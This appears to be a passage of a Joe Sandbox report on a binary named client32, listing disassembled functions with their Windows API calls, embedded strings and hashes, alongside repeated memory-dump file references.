Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
API String ID: 2713866921-163732079
Opcode ID: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
Instruction ID: 7c0026f42908b5e278ccc52ab84e836bf453825b517ccc9397fc8abb106b0303
Opcode Fuzzy Hash: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
Instruction Fuzzy Hash: 6AF0BB75E1162D6BDB00DB649D41FEEF76C9F05209F0000A4FF14A6141EA346A058BDA

Function 11085290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0

Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A

Strings

EDC, xrefs: 1108529D
cenctrl_protection, xrefs: 110852CA
cenctrl.dll, xrefs: 110852B9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EDC$cenctrl.dll$cenctrl_protection
API String ID: 145871493-3137230561
Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3

Function 11017050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B

Strings

IPTip_Main_Window, xrefs: 11017053

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A

Function 11061070 Relevance: 7.6, APIs: 5, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 11061086

Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,CF3D35D0,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
String ID:
API String ID: 3203075409-0
Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5

Function 1111B6C0 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11116D20: DeleteObject.GDI32(?), ref: 11116D56

SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
SelectPalette.GDI32(?,?,00000000), ref: 1111B751
DeleteObject.GDI32(?), ref: 1111B764
DeleteObject.GDI32(?), ref: 1111B771
DeleteObject.GDI32(?), ref: 1111B796

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$PaletteSelect
String ID:
API String ID: 2820294704-0
Opcode ID: cb0a73df859393638efd181be91363b638ad65a68c4c6db285cd23b291c12f0a
Instruction ID: 4bce230f8761cd1a735e6937cf04829ed5524ff8e33b275e78ed84c6797a3d67
Opcode Fuzzy Hash: cb0a73df859393638efd181be91363b638ad65a68c4c6db285cd23b291c12f0a
Instruction Fuzzy Hash: EE21A175A00916ABD7049F78C9C47A9F7A8FB08314F65063AE91CDB200C771FC518BD0

Function 110250E0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
GetDlgItem.USER32(?,00001399), ref: 11025131
TranslateMessage.USER32(?), ref: 1102514A
DispatchMessageA.USER32(?), ref: 11025154
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95

Function 11023370 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
GetDlgItem.USER32(?,00001399), ref: 110233C1
TranslateMessage.USER32(?), ref: 110233DA
DispatchMessageA.USER32(?), ref: 110233E4
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91

Function 1103F120 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB

CreateRectRgnIndirect.GDI32(?), ref: 1103F168
CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
DeleteObject.GDI32(00000000), ref: 1103F183
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRect$Indirect
String ID:
API String ID: 3044651595-0
Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93

Function 11057380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(000104E4,00000501,00000000,00000000), ref: 11057461

Strings

Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
Warning. DoNotify(%d) not processed, xrefs: 1105835B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
API String ID: 410705778-2398254728
Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0

Function 1101B1E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,CF3D35D0,?,?,?,1117A7A8,000000FF), ref: 110DC631

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1101B426
__CxxThrowException@8.LIBCMT ref: 1101B441

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 2637870501-623348194
Opcode ID: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
Opcode Fuzzy Hash: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91

Function 11021250 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110212B2
IsWindowVisible.USER32(00000000), ref: 11021383
wsprintfA.USER32 ref: 110213C7

Strings

%d,%d,%d,%d,%d,%d, xrefs: 110213C1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
Opcode Fuzzy Hash: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1

Function 110197B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

